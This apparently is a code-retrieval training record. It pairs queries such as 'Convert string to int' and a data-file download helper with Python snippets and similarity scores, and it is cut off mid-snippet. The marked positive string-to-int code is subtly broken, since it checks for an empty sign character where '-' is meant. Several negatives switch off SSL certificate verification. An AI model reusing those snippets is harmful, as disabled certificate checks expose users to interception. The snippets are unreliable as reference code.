[ "0.8262509", "0.7803891", "0.7300844", "0.7271281", "0.72517717", "0.718009", "0.7099532", "0.70860934", "0.7008732", "0.69923896", "0.68970364", "0.68703055", "0.6847767", "0.67874974", "0.6779158", "0.676237", "0.67338043", "0.6702256", "0.6671091", "0.6608676", "0.65521425", "0.6549257", "0.64477986", "0.6446148", "0.6391005", "0.63486177", "0.6310224", "0.629431", "0.62617946", "0.62579745", "0.62447256", "0.6213834", "0.61957455", "0.61919284", "0.6186289", "0.61788934", "0.6176745", "0.617019", "0.6161873", "0.6141049", "0.6140734", "0.61225206", "0.61205983", "0.6116312", "0.60901433", "0.6064586", "0.60526735", "0.6042612", "0.604002", "0.60309285", "0.60240746", "0.60240746", "0.60240746", "0.60230374", "0.6008757", "0.6004034", "0.59913284", "0.59823346", "0.5977802", "0.5965295", "0.5947173", "0.59388626", "0.5936797", "0.5914856", "0.58991164", "0.58949023", "0.5894078", "0.5891231", "0.5880289", "0.58697605", "0.5863824", "0.5857353", "0.58536416", "0.5851886", "0.5848337", "0.58477986", "0.58469474", "0.583977", "0.5826761", "0.5816921", "0.580951", "0.5805208", "0.5804311", "0.57969606", "0.5793629", "0.57871675", "0.57863337", "0.5779666", "0.5751204", "0.57451016", "0.57395995", "0.5734787", "0.5719986", "0.5705476", "0.57031614", "0.56831586", "0.5680115", "0.5679112", "0.5678006", "0.5670857" ]
0.78195685
1
Convert string to int
def string_to_int(s): return functools.reduce(lambda running_sum, c: running_sum * 10 + string.digits.index(c), s[s[0] == '-':], 0) * (-1 if s[0] == '' else 1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _str_to_int(in_str):\n if in_str == '':\n return 0\n return int(in_str, 10)", "def to_int(s: str) -> int:\n try:\n return int(s.replace('_', ''))\n except ValueError:\n return int(ast.literal_eval(s))", "def dec2int(r: str) -> int:", "def to_int(str_val: str) -> int:\n\n return int(str_val) if is_int(str_val) else None", "def toint(s):\n try:\n n = int(s)\n except ValueError:\n n = 0\n return n if n >= 0 else 0", "def to_int(param, in_str):\n try:\n return int(in_str)\n except ValueError:\n return exit_msg(f\"Bad Request: Wrong type, expected 'int' for parameter '{param}'\")", "def byte_str_to_int(str):\n return int.from_bytes(str, byteorder = \"big\")", "def string_to_int(value):\n ival = None\n\n try:\n ival = float(value)\n ival = int(ival)\n except Exception:\n pass\n\n return ival", "def iint(string):\n try:\n return int(string.strip())\n except:\n return 0", "def convert(s):\n\n try:\n\n return int(s)\n except (ValueError, TypeError) as e:\n print(\"conversion error {}\".format(str(e)), file=sys.stderr)\n pass\n return -1", "def str_to_int(inp, default=None):\n try:\n return int(inp)\n except ValueError:\n return default", "def parse_string_int(text: str) -> int:\n if not text:\n raise ValueError(\"Text to convert cannot be empty.\")\n if not isinstance(text, str):\n raise ValueError(\"Text to convert cannot be a string.\")\n try:\n return int(text)\n except ValueError as e:\n if text in _int_values:\n return _int_values[text]\n raise ValueError(\n \"Unable to convert '{0}' into int.\".format(text)) from e", "def _str_to_int(x):\n if x == None or x == '':\n return 0\n return int(x)", "def safe_int(str):\n if not str:\n return None\n try:\n return int(str)\n except ValueError:\n return 0", "def make_int(int_string):\n\n if int_string.isdigit():\n return int(int_string)\n else:\n return -1", "def convertInt(s):\n try:\n int(s)\n return \"INT\"\n except:\n return s", "def safeint(s):\n try:\n return int(force_unicode(s))\n except (ValueError, TypeError):\n return 0", "def try_parse_int(string):\n try:\n return int(string)\n except Exception:\n return 0", "def parse(value):\n return int(value)", "def getNumFromString(self, string):\n \n m = re.search(r'\\d+$', string)\n if m is not None:\n return int(m.group())\n else:\n return 0", "def intparse(text):\n return int(text, 0)", "def stringToInt(*args):\n return _libsbml.SBO_stringToInt(*args)", "def _as_int(self, int_string, int_description):\n try:\n return int(int_string)\n except ValueError:\n raise ftputil.error.ParserError(\n \"non-integer {} value {!r}\".format(int_description, int_string)\n )", "def _Int(s):\n try:\n return int(s)\n except ValueError:\n assert '.' not in s # dots aren't allowed in individual element names\n return s", "def value_from_str(self, s):\n try:\n return int(s)\n except ValueError:\n return super().value_from_str(s)", "def bin2int(r: str) -> int:", "def str2num(s):\r\n try:\r\n return int(s)\r\n except ValueError:\r\n return float(s)", "def hex2int(r: str) -> int:", "def _try_int(self, string):\n value = re.sub(r\"[^0-9]+\", '', string)\n try:\n value = int(value)\n except ValueError:\n value = None\n return value", "def int(s):\n if s is None or s == \"\":\n i = -maxsize\n else:\n i = int(s)\n\n return i", "def _cast_to_positive_int(integer_string):\n ret = int(integer_string)\n if ret < 0:\n raise ValueError()\n return ret", "def ip_str_to_int(ip_str):\n return int(ipaddress.ip_address(ip_str))", "def to_int(value):\n\n if isinstance(value, int):\n return value\n\n elif isinstance(value, string_types):\n return int(value) if value.isdigit() else None", "def to_int(s, fallback=0):\n try:\n result = int(s)\n except ValueError:\n # logging.warning(\"Couldn't cast %s to int\" % s)\n result = fallback\n except TypeError:\n # logging.warning(\"Couldn't cast %s to int\" % s)\n result = fallback\n\n return result", "def parse_number(txt):\n return int(txt)", "def parseInt(s, ret=0):\n if not isinstance(s, str):\n return int(s)\n elif s:\n if s[0] in \"+-\":\n ts = s[1:]\n else:\n ts = s\n\n if ts and all([_ in \"0123456789\" for _ in ts]):\n return int(s)\n\n return ret", "def string_to_integer(value, default=None):\n if value is None:\n return None\n try:\n return abs(int(value))\n except (ValueError, TypeError):\n pass\n try:\n value = ''.join([letter for letter in str(value) if letter.isdigit()])\n return abs(int(value))\n except (ValueError, TypeError):\n return default", "def Int(val):\n try:\n return int(val)\n except ValueError:\n return ''", "def convert_to_int_if_numeric(original_string):\n if original_string.isdigit():\n return int(original_string)\n else:\n return original_string", "def to_int(variable):\n try:\n return int(variable)\n except ValueError:\n return variable", "def check_string_to_int(int_string):\n try:\n if int_string[0] in ('-', '+'):\n return int_string[1:].isdigit()\n\n except TypeError:\n return int(int_string)\n\n return int_string.isdigit()", "def atoi(c: str) -> Union[int, str]:\n return int(c) if c.isdigit() else c", "def string_to_number(string):\n if not string:\n return 0\n try:\n return int(string)\n except ValueError:\n return float(string)", "def __hex2int(_hex_str):\n return int(\"0x\"+_hex_str, 16)", "def parse_int(value):\n if isinstance(value, (int, float)):\n return int(value)\n else:\n return int(value, base=10)", "def str2int(self, video_path):\n try:\n return int(video_path)\n except ValueError:\n return video_path", "def text_to_int(text):\n # type (str) -> int\n try:\n return int(\"\".join(x for x in text if x.isdigit()))\n except ValueError:\n return 0", "def convert_number(s):\n\n try:\n return int(s)\n except ValueError:\n return None", "def integer(self):\n literal = re.compile(r'(0){1}|([1-9])\\d*')\n result = ''\n while self.current_char is not None and self.current_char.isdigit():\n result += self.current_char\n self.advance()\n if literal.fullmatch(result) is not None:\n return int(result)\n else:\n self.error()", "def base_to_int(string, base):\n if string==\"0\" or base <= 0 : return 0 \n result = 0 \n return result", "def hex_to_int(hex_string):\r\n return int(hex_string, 16)", "def pseudo_int(string_num):\r\n int_num = 0\r\n reversed_string_num = string_num[::-1] # begin read the characters from the end of the string.\r\n for indexx in range(len(string_num)):\r\n digit = reversed_string_num[indexx]\r\n int_num += (ord(digit) - ord('0')) * 10**indexx # '2698' => 8 * 10**0 + 9 * 10**1 + 6 * 10**2 + 2 * 10**3 = 2698\r\n return int_num", "def toInteger(data):\n\tif isInteger(data):\n\t\treturn data\n\telse:\n\t\treturn ord(data)", "def num(s: str):\n try: return int(s)\n except ValueError: return float(s)", "def try_parse_int(value):\n try:\n return int(value)\n except:\n return 0", "def safe_int(s):\n try:\n return int(s)\n except Exception, e:\n return None", "def perc_str_to_int(string: str) -> int:\n match = re.search(r\"\\((\\d+)%\\)$\", string)\n if match:\n return int(match.group(1))\n raise ValueError(\"Cannot find percentage in table\")", "def bitstr_to_int(a):\n return int(a, 2)", "def SBO_stringToInt(*args):\n return _libsbml.SBO_stringToInt(*args)", "def bytes_to_int(s):\n # int type casts may return a long type\n return int(s.encode('hex'), 16)", "def str_to_num(s):\n\n method = {\n \"float\": string.atof,\n \"int\": string.atoi\n }\n\n if not type(s) is StringType:\n return 0\n\n if \".\" in s:\n return method[\"float\"](s)\n else:\n return method[\"int\"](s, 10)", "def stringToIntegerOrDefault( str_value, default_value=None ):\r\n \r\n # If the value is none, then don't try to convert it\r\n if str_value is None:\r\n return default_value\r\n \r\n # Try to convert the string to an integer\r\n try:\r\n return int(str(str_value).strip())\r\n except ValueError:\r\n # Return none if the value could not be converted\r\n return default_value", "def find_int_in_str(s: str) -> int:\n \n i = int(re.search(r'\\d+', s).group())\n\n return i", "def hex2int(hex_str):\n return int(hex_str, 16)", "def parse_int(self, selector):\n return int(re.sub('[^0-9]', '', self.parse_string(selector)))", "def convertStringToInt(xmlNode):\n try:\n val = int(xmlNode.text)\n return val\n except (ValueError,TypeError):\n raise IOError('Integer value is required for content of node %s, but got %s' %(node.tag, node.text))", "def coerce_to_int(val):\n if isinstance(val, int):\n return val\n if val is None:\n return 0\n # Otherwise, val must be a string, since that's the only other kind of data\n # type that we can create. Strip out all non-digit characters.\n new_val = \"\".join([c for c in val if c in map(str, list(range(10)))])\n if new_val == \"\":\n return 0\n return int(new_val)", "def cast_int(v):\n try:\n return int(v)\n except ValueError:\n return v", "def data_to_int(data): \r\n data = str(data).strip().upper()\r\n if data[0]== 'B':\r\n return bin_to_int(data[1:])\r\n elif data[0]== 'H':\r\n return hex_to_int(data[1:])\r\n else:\r\n return int(data, 10)", "def to_int(name, default=0):\n try:\n return int(get(name))\n except (TypeError, ValueError):\n return default", "def find_number(self, string):\n #string = string.encode('ascii', 'ignore')\n #return int(filter(str.isdigit, string))\n s = (re.findall('\\d+', string))\n return int(''.join(s))", "def __rank_from_str_to_int(rank: str) -> int:\n return int(rank) - 1", "def possible_int(arg):\n try:\n return int(arg)\n except ValueError:\n logging.info(f'failed to parse {arg} as an int, treating it as a string')\n return arg", "def is_integer(self, string):\n try:\n return int(string)\n except:\n return False", "def atoi(text: str) -> Union[int, str]:\r\n ...", "def isInt(string):\n try: int(string)\n except ValueError: return 0\n else: return 1", "def char_int(inp_char):\n try:\n nInt = int(inp_char)\n except:\n nInt = 0\n return nInt", "def to_int(num):\n# ast.literal_eval raises an exception if the input isn't\n# a valid Python datatype, so the code won't be executed if it's not.\n if isinstance(num, basestring):\n try:\n num = ast.literal_eval(num)\n except Exception:\n err_message = \"ValueError: Invalid value, must be integer or float\"\n raise Exception(err_message)\n if not isinstance(num, int):\n try:\n num = int(num)\n except Exception:\n err_message = \"ValueError: Invalid datatype, must be integer or float\"\n raise Exception(err_message)\n if num < 1:\n err_message = \"ValueError: Invalid value, must be positive integer\"\n raise Exception(err_message)\n return num", "def parse_int(value):\n try:\n return int(value)\n except (ValueError, TypeError):\n return None", "def str2num(s):\n\n i = 0\n l = 0\n try:\n for i in range(len(s)):\n l = l << 8\n l += ord(s[i])\n return l\n except:\n return 0", "def hash_string_to_int(\r\n k: bytes,\r\n e: str,\r\n) -> int:\r\n return int.from_bytes(hash_string(k, e), 'big')", "def base36_to_int(s: str):\n # To prevent overconsumption of server resources, reject any\n # base36 string that is longer than 13 base36 digits (13 digits\n # is sufficient to base36-encode any 64-bit integer)\n if len(s) > 13:\n raise ValueError(\"Base36 input too large\")\n return int(s, 36)", "def Hex2Int(hexString):\n answer = hexString[0]\n log.debug(f\"Hex {hexString} decoded to {answer}\")\n\n return answer", "def strToDec(string):\n\tstring = string.lstrip(\"0\")\n\tif len(string) == 0:\n\t\treturn 0\n\telse:\n\t\treturn eval(string)", "def getInt(string, radix, needHexPrefix):\n return (0)", "def issn2int(issn_str):\n\n pat = r\"^\\d{4}-\\d{3}[\\dxX]$\"\n p = compile(pat)\n if p.match(issn_str):\n res = 0\n check = map(lambda x: int(x), issn_str[:4] + issn_str[5:8])\n check_bit = int(issn_str[-1]) if is_int(issn_str[-1]) else issn_str[-1]\n for pp in zip(check, range(8, 1, -1)):\n res += pp[0] * pp[1]\n\n rem = (11 - res) % 11\n rem = \"X\" if rem == 10 else rem\n\n if rem == check_bit:\n return int(issn_str[0:4] + issn_str[5:8])\n else:\n logging.error(\n \" issn2int() : in issn {0} \" \"check bit is corrupt\".format(issn_str)\n )\n logging.error(\" equal to {0}, should be {1}\".format(check_bit, rem))\n # raise ValueError(' issn2int(): invalid check digit'.format(check_bit, rem))\n return int(issn_str[0:4] + issn_str[5:8])\n\n else:\n logging.error(\n \" issn2int() : issn {0} : does not match \"\n \"the pattern {1}\".format(issn_str, pat)\n )\n\n raise ValueError(\" issn2int(): invalid issn string\")", "def do_convert_integer(text, pos=1):\n if not isinstance(text, basestring):\n text = str(text)\n if not isinstance(pos, int):\n raise TypeError(\"expected: position argument is of type int, got: type {}\".format(type(pos)))\n if pos < 1:\n raise ValueError(\"expected: pos >= 1, got: pos = {}\".format(pos))\n match = re.findall(\"[0-9]+\", text)\n if match:\n try:\n number = int(match[pos - 1])\n except IndexError:\n raise IndexError(\"could not find {} numbers in string '{}'\".format(pos, text))\n return number\n else:\n raise ValueError(\"could not find a number in string '{}'\".format(text))", "def safe_int(int_string: str = \"0\") -> int:\n int_things = [None, \"\", \"-\", \"0\"]\n\n if int_string in int_things:\n return 0\n else:\n return int(int_string)", "def to_number(s):\n ret = s\n try:\n ret = float(s)\n except ValueError:\n ret = ret.strip('\\'').strip()\n return ret\n\n try:\n ret = int(s)\n except ValueError:\n pass\n return ret", "def string_id_to_integer(front_type_string):\n\n check_front_type(front_type_string)\n if front_type_string == WARM_FRONT_STRING_ID:\n return WARM_FRONT_INTEGER_ID\n\n return COLD_FRONT_INTEGER_ID", "def try_as_int( i ) : \r\n\r\n try : \r\n\r\n ret = int( i )\r\n if ret != i : \r\n raise exceptions.Exception(\"conversion failed\")\r\n\r\n except :\r\n raise Eggog( \"'%s': failed to convert to a (Python) integer!\" % (repr(i), ) ) \r\n\r\n return ret", "def _coerce_to_integer(value):\n try:\n return int(value)\n except ValueError:\n return int(float(value))", "def convert_to_num(version_str):\n if not version_str:\n return 0\n if str(version_str).isdigit():\n return version_str\n version_str = version_str.replace(\".\", \"\")\n return int(version_str) if version_str.isdigit() else 0", "def isInt(astring):\n try: int(astring)\n except ValueError: return 0\n else: return 1", "def normalise_string(value):\n try:\n return int(value, 0)\n except ValueError:\n return normalise_bytes(value)", "def get_integer(self):\n string = ''\n while self.current_char is not None and self.current_char.isdigit():\n string += self.current_char\n self.advance()\n return int(string)", "def __file_from_str_to_int(rank: str) -> int:\n # Warning, my own, not very well tested implementation of base26 converter\n values = []\n for letter in rank:\n values.append(ascii_lowercase.index(letter.lower()))\n index_value = 0\n counter = 0\n for value in reversed(values):\n if counter < 1:\n index_value += value\n else:\n index_value += (value * 26) ** counter\n counter += 1\n return index_value", "def base32_to_int(s):\n mistyped = False\n if s.find('o') > -1 or s.find('i') > -1 or s.find('l') > -1:\n s = s.replace('o', '0').replace('i', '1').replace('l', '1')\n mistyped = True\n decoded = 0\n multi = 1\n while len(s) > 0:\n decoded += multi * base32_digits.index(s[-1:])\n multi = multi * 32\n s = s[:-1]\n if mistyped:\n raise MistypedIDException(decoded)\n return decoded", "def make_int(value):\n return int(value[0])", "def try_int_cast(value):\n try: \n return int(value)\n except:\n return value" ]
[ "0.82145184", "0.8003485", "0.79868853", "0.79608244", "0.7875066", "0.7750694", "0.7643904", "0.76203454", "0.7554625", "0.75325245", "0.7502179", "0.7484789", "0.74722457", "0.7454978", "0.7444927", "0.7426303", "0.7408998", "0.74060065", "0.73542196", "0.72918594", "0.7284529", "0.72715396", "0.7265521", "0.7259769", "0.72575045", "0.7250934", "0.7247325", "0.7244533", "0.7221429", "0.7219588", "0.72059864", "0.7203081", "0.7162925", "0.71446407", "0.7105776", "0.7101248", "0.7059997", "0.70463896", "0.70354307", "0.70235336", "0.7015917", "0.7006769", "0.69973826", "0.69816077", "0.69788283", "0.69647706", "0.69441617", "0.6944083", "0.6926748", "0.6921629", "0.6903126", "0.68645895", "0.68430555", "0.6812578", "0.6796587", "0.6757562", "0.6757368", "0.6752958", "0.6749515", "0.6747937", "0.674277", "0.67401654", "0.67323864", "0.6723966", "0.6696723", "0.6691156", "0.6686279", "0.6680411", "0.6679265", "0.6677268", "0.6674578", "0.66712993", "0.6667335", "0.66542053", "0.66538465", "0.66477305", "0.66455036", "0.6642254", "0.6637777", "0.6636191", "0.6628659", "0.6623607", "0.6622061", "0.6617363", "0.6612083", "0.660638", "0.6593814", "0.65818334", "0.6581461", "0.657959", "0.65558475", "0.65204364", "0.6518275", "0.6503089", "0.64990526", "0.64931285", "0.64799434", "0.6477363", "0.6472366", "0.64713675" ]
0.7517601
10
this method retrieves a data file from an internet location. make sure it is not password protected or anything.
def get_data_file(url, data=None, headers={}): req = urllib2.Request(url=url) for key in headers: req.add_header(key, headers[key]) site = urllib2.urlopen(req) data = site.read() headers = site.info() site.close() output = open(local_file, 'w') output.write(data) output.close() return data, headers
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_data(location):\n # This is factored out so we can use a different retrieval method if required.\n # Originally used urllib2, but it had SSL issues on my machine\n response = requests.get(location)\n return response.content", "def web_get_file(self, url):\n try:\n print(url)\n response = requests.get(url, verify=False)\n file_buffer = BytesIO(response.content)\n file_buffer.seek(0)\n return file_buffer\n except:\n print(traceback.print_exc())\n return None", "def json_file():\r\n urlretrieve(URL, PATH)\r\n return PATH", "def json_file():\r\n urlretrieve(URL, PATH)\r\n return PATH", "def download_remote_data_file(data_url: str) -> str:\r\n # Create a data directory if it doesn't exist.\r\n data_dir_path = _find_or_create_dir(DATA_FOLDER)\r\n \r\n # Download the data file if it doesn't exist.\r\n filename = os.path.basename(urlparse(data_url).path)\r\n data_file_path = os.path.join(data_dir_path, filename)\r\n if not os.path.exists(data_file_path):\r\n print(f'Downloading data file {data_file_path}...')\r\n with urlopen(data_url) as response:\r\n with open(data_file_path, \"wb\") as data_file:\r\n shutil.copyfileobj(response, data_file)\r\n print('Done downloading data file.')\r\n\r\n return data_file_path", "def download_data(self, filename=None):\n if (filename is None): filename = ['Public','Gathering.dat']\n elif (type(filename) is str): filename = [filename]\n elif (type(filename) is list): pass\n else: raise TypeError('Require the file path (\\'Public/Gathering.dat\\')')\n\n self.newportxps.ftpconn.connect(**self.newportxps.ftpargs)\n remote_path = posixpath.join(self.newportxps.ftphome, *filename)\n self.newportxps.ftpconn.cwd(remote_path)\n self.newportxps.ftpconn.save(posixpath.basename(remote_path), posixpath.basename(remote_path))\n self.newportxps.ftpconn.close()", "def download():\n toydata = requests.get(DATA_URL).json()\n return toydata", "def ReadRemoteFile(url) -> bytes:\n local_url = download_util.DownloadResource(url)\n return file_util.OpenFile(local_url).read()", "def get_datafile(file_):\n\n if os.path.exists(file_):\n return file_\n else:\n\n # download file, then return file_ path\n\n (path_, fname) = os.path.split(file_)\n if path_ == '':\n path_ = '.' # relative to current path\n\n try:\n resp = urllib_request.urlopen(urljoin(DATA_SERVER, fname))\n except urllib_request.HTTPError as ex:\n ex.msg = (\"{0}. '{1}' not found on server or server is down\"\n .format(ex.msg, fname))\n raise ex\n\n # # progress bar\n # widgets = [fname + ': ',\n # pb.Percentage(),\n # ' ',\n # pb.Bar(),\n # ' ',\n # pb.ETA(),\n # ' ',\n # pb.FileTransferSpeed(),\n # ]\n\n # pbar = pb.ProgressBar(widgets=widgets,\n # maxval=int(resp.info().getheader('Content-Length'))\n # ).start()\n\n if not os.path.exists(path_):\n os.makedirs(path_)\n\n sz_read = 0\n with open(file_, 'wb') as fh:\n # while sz_read < resp.info().getheader('Content-Length')\n # goes into infinite recursion so break loop for len(data) == 0\n while True:\n data = resp.read(CHUNKSIZE)\n\n if len(data) == 0:\n break\n else:\n fh.write(data)\n sz_read += len(data)\n\n # if sz_read >= CHUNKSIZE:\n # pbar.update(CHUNKSIZE)\n\n # pbar.finish()\n return file_", "def retrieve_data(file: str, landing_path: str, local: bool) -> bool:\n\n base_url = \"https://files.training.databricks.com/static/data/health-tracker/\"\n url = base_url + file\n driverPath = \"file:/databricks/driver/\" + file\n dbfsPath = landing_path + file\n if local:\n urlretrieve(url, landing_path + file)\n else:\n urlretrieve(url, file)\n dbutils.fs.mv(driverPath, dbfsPath)\n return True", "def download_data(self, format = 'srt'):\n resp, content = httplib2.Http(\".cache\").request(self.url, \"GET\")\n suburl = json.loads(content)['url']\n resp, content = httplib2.Http(\".cache\").request(suburl, \"GET\")\n\n return content", "def _download_epw_file(url):\n r = requests.get(url)\n if r.ok:\n # py2 and 3 compatible: binary write, encode text first\n log.debug(\" ... OK!\")\n return io.StringIO(r.text)\n else:\n log.error(\" connection error status code: %s\" % r.status_code)\n r.raise_for_status()", "def _get_data(self):\n try:\n \n with open('auto-mpg.data.txt', 'w') as data_file:\n url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/auto-mpg/auto-mpg.data'\n r = requests.get(url, stream=True)\n if r.status_code == 200:\n logger.debug(f'response code from url: 200')\n self.response_code = 200\n for line in r.iter_lines():\n data_file.write(line.decode() + '\\n')\n else:\n self.response_code = r.status_code\n logger.info(f'{url} returned status code {r.status_code}')\n except Exception as e:\n logger.info(f'Unexpected error writing to file {str(e)}. Exiting.')\n sys.exit()", "def fetch_save(url):\n\n name = url.split(\"/\")[-1]\n response = requests.get(url, stream=True)\n if response.status_code == 200:\n with open(f\"{DATA_PATH}/{name}\", \"wb\") as f:\n f.write(response.raw.read())\n else:\n logging.info(f\"Failed {url} download\")", "def fetch_data(data_url):\n return requests.get(data_url).content", "async def _download(self) -> None:\n\n # do request\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url, auth=self._auth, timeout=self._timeout) as response:\n # check response\n if response.status == 200:\n # get data and return it\n self._buffer = await response.read()\n elif response.status == 401:\n log.error(\"Wrong credentials for downloading file.\")\n raise FileNotFoundError\n else:\n log.error(\"Could not download file from filecache.\")\n raise FileNotFoundError", "def get_data_from_web():\n pass", "def getfilehttps(self, url):\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n response = urllib.request.urlopen(url, context=ctx)\n result = response.read()\n return result", "def downloadData(url):\n \n content = urllib2.urlopen(url)\n return content", "def accessRemoteData(dataUrl):\n req = Request(dataUrl)\n try:\n response = urlopen(req)\n except ValueError as e:\n print('Invalid URL string', e.reason)\n sys.exit()\n except HTTPError as e:\n print('Error code: ', e.code)\n sys.exit()\n except URLError as e:\n print('Reason: ', e.reason)\n sys.exit()\n else:\n print('Request successful, downloading data.')\n return response.read().decode('utf-8')", "def downloadString(url):\n filein = urllib2.urlopen(url)\n data = filein.read()\n filein.close()\n return data", "def download_data(origin_time, net, sta, loc, chan):\n \n dataDir_get = '/import/netapp-m-02-bay200/mseed_online/archive/'\n \n fileName = \".\".join((net, sta, \".\" + chan + \".D\",\n origin_time.strftime(\"%Y.%j\")))\n filePath = os.path.join(dataDir_get, origin_time.strftime(\"%Y\"),\n net, sta, chan + '.D', fileName)\n o_time2 = origin_time + 86400\n fileName2 = \".\".join((net, sta, \".\" + chan + \".D\",\n o_time2.strftime(\"%Y.%j\")))\n filePath2 = os.path.join(dataDir_get, o_time2.strftime(\"%Y\"),\n net, sta, chan + '.D', fileName2)\n\n if os.path.isfile(filePath):\n if origin_time.hour > 21:\n st = Stream()\n st.extend(read(filePath, starttime = origin_time - 180,\n endtime = origin_time + 3 * 3600))\n st.extend(read(filePath2, \n starttime = UTCDateTime(o_time2.year, o_time2.month, \n o_time2.day, 0, 0),\n endtime = origin_time + 3 * 3600))\n st.merge(method=-1)\n else:\n st = read(filePath, starttime = origin_time - 180,\n endtime = origin_time + 3 * 3600)\n else:\n print \"++++ cannot find the following file: \\n %s \\n++++\" % filePath\n\n if not st:\n raise RotationalProcessingException('Data not available for this'\n ' event...')\n st.trim(starttime=origin_time-180, endtime=origin_time+3*3600)\n\n print 'Download of', st[0].stats.station, st[0].stats.channel, \\\n 'data successful!'\n\n return st", "def downloadFile()-> None:\n logging.info(f\"Downloading current data set {getTime()}\")\n with open(DATA_FILE,\"wb\") as f:\n f.write(get(\"https://covid.ourworldindata.org/data/owid-covid-data.csv\").text.encode())\n logging.info(f\"Finished Downloading current data set {getTime()}\")", "def do_GET(self):\n server_ip = Setup.parse_options()['ip_address']\n uri = \"http://\" + server_ip + self.path\n response = urllib.urlopen(uri)\n self.copyfile(response, self.wfile)\n headers = self.generate_header_dic(self.headers.headers)\n ip_address = self.client_address[0] # get client iP address\n if Setup.system_status != 'green':\n self.process_request(ip_address, headers, self.path)\n self.process_response(ip_address, response.headers)", "def fetch_file(self, location, output=None):\n\n self.log.debug(\"Fetching '%s' file...\" % location)\n\n if not output:\n output = tempfile.mktemp(\"-dogen\")\n \n self.log.debug(\"File will be saved as '%s'...\" % output)\n\n with open(output, 'wb') as f:\n f.write(requests.get(location, verify=self.ssl_verify).content)\n\n return output", "def _download_from_url(self) -> bytes:\n response = requests.get(self.url, allow_redirects=True)\n return response.content", "def connect(self):\r\n zip = self.zip\r\n ccode = self.ccode\r\n apikey = self.apikey\r\n url = f\"https://api.openweathermap.org/data/2.5/weather?zip={zip},{ccode}&appid={apikey}\"\r\n\r\n weather_obj = self._download_url(url)\r\n if weather_obj is not None:\r\n return weather_obj", "def get_file(url):\n helpers.make_workdir() # create temp working directory\n file_url = url + constant.MALICIOUS_LOCATION\n print(file_url)\n filename = wget.download(file_url, out=constant.WORKDIR)\n return filename", "def download(self):\n if not self.url:\n raise RuntimeError(self.tips)\n\n download_file_name = os.path.join(\n self.raw_path, os.path.splitext(os.path.basename(self.url))[0]\n )\n file_format = self.url.split(\".\")[-1]\n if \"amazon\" in self.url:\n raw_file_path = os.path.join(\n self.raw_path, f\"{self.dataset_name}.json.{file_format}\"\n )\n else:\n raw_file_path = os.path.join(\n self.raw_path, f\"{self.dataset_name}.{file_format}\"\n )\n if \"1drv.ms\" in self.url:\n file_format = \"zip\"\n raw_file_path = os.path.join(\n self.raw_path, f\"{self.dataset_name}.{file_format}\"\n )\n if not os.path.exists(raw_file_path):\n print(f\"download_file: url: {self.url}, raw_file_path: {raw_file_path}\")\n download_file(self.url, raw_file_path)\n if \"amazon\" in raw_file_path:\n # amazon dataset do not unzip\n print(\"amazon dataset do not decompress\")\n return\n elif file_format == \"gz\":\n file_name = raw_file_path.replace(\".gz\", \"\")\n with gzip.open(raw_file_path, \"rb\") as fin:\n with open(file_name, \"wb\") as fout:\n shutil.copyfileobj(fin, fout)\n else:\n shutil.unpack_archive(\n raw_file_path, self.raw_path, format=get_format(file_format)\n )\n\n if not os.path.exists(download_file_name):\n return\n elif os.path.isdir(download_file_name):\n os.rename(\n download_file_name, os.path.join(self.raw_path, self.dataset_name)\n )\n else:\n os.rename(\n download_file_name,\n os.path.join(\n self.raw_path,\n f'{self.dataset_name}.{download_file_name.split(\".\")[-1]}',\n ),\n )", "def get_file(self):\n while not (self.is_connection_working()):\n print('Connection is not working. Reason should be printed above. Sleeping 5 minutes and retrying.')\n time.sleep(300)\n i = 0\n while True:\n if i >= 3:\n print('Looks like file {} is really not on FTP. Skipping.'.format(self.url))\n return\n if self.file_exists_on_ftp():\n with closing(request.urlopen(self.url, )) as r:\n with open(self.save_filepath, 'wb') as f:\n shutil.copyfileobj(r, f)\n if i > 0:\n print('Download succeeded on attempt {}'.format(i+1))\n return\n else:\n print(\n 'requests.urlopen error. This sometimes means that file {} \"not exists\" on FTP '\n 'but sometimes it is just \"erruption on the Sun\" and file is downloaded on second attempt. '\n 'Sleeping 1 minute and retrying download. Retry will be done {} more times'.format(self.url,\n 3 - (i + 1)))\n time.sleep(60)\n i += 1\n continue\n # print('WARNING: Connection is OK, but system was not able to get file. Skipping.')", "def getfile(url):\n try:\n return urlreq.urlopen(url)\n except urlreq.HTTPError as e:\n safeprint(\"Sever returned with response code \" + str(e.getcode()) + \", download failed.\")", "def _download_data(src_url, dst_file):\n try:\n subprocess.check_call([\n \"wget\", \"--load-cookies=cookies.txt\", \"--tries=2\", \"-O\", dst_file, src_url\n ])\n except subprocess.CalledProcessError as process_error:\n print(\"ERROR: {}\".format(process_error))\n logging.error(\"Failed to download data file. Data url: %s.\", src_url)", "def download_country_data(\n url=default_url,\n filename=default_data_file,\n force=False\n):\n if not os.path.isfile(filename) or force:\n text = requests.get(url).text\n with open(filename, 'w') as fp:\n fp.write(text)", "def _get(self, remote_filename, local_path):\n\n with local_path.open('wb') as local_file:\n file_id = self.get_file_id(remote_filename)\n if file_id is None:\n raise BackendException(\n 'File \"%s\" cannot be downloaded: it does not exist' %\n remote_filename)\n\n response = self.http_client.get(\n self.content_url + '/nodes/' + file_id + '/content', stream=True)\n response.raise_for_status()\n for chunk in response.iter_content(chunk_size=DEFAULT_BUFFER_SIZE):\n if chunk:\n local_file.write(chunk)\n local_file.flush()", "def download_data():\n urllib.request.urlretrieve('http://cs.iit.edu/~culotta/cs579/a1/edges.txt.gz', 'edges.txt.gz')", "def download_data():\n # Download Unihan meta data for radical-stroke analysis\n os.system(' mkdir Unihan')\n os.system(' curl -O http://unicode.org/Public/UCD/latest/ucd/Unihan.zip')\n os.system(' apt-get -y install unzip')\n os.system(' unzip Unihan.zip -d Unihan/')\n os.system(' rm Unihan.zip')\n\n data_path = 'Unihan/Unihan_RadicalStrokeCounts.txt'\n assert(os.path.isfile(data_path))\n\n return data_path", "def get_remote_file(url):\n # Disable the proxies by not trusting the env\n session = requests.Session()\n session.trust_env = False\n\n # Make the request\n requests.packages.urllib3.disable_warnings()\n try:\n r = session.get(url, verify=False)\n except requests.exceptions.RequestException as e:\n # catastrophic error. bail.\n print(e)\n sys.exit(1)\n\n r = session.get(url, verify=False)\n remote_file = r.text\n return remote_file", "def __maybeDownload():\n if not 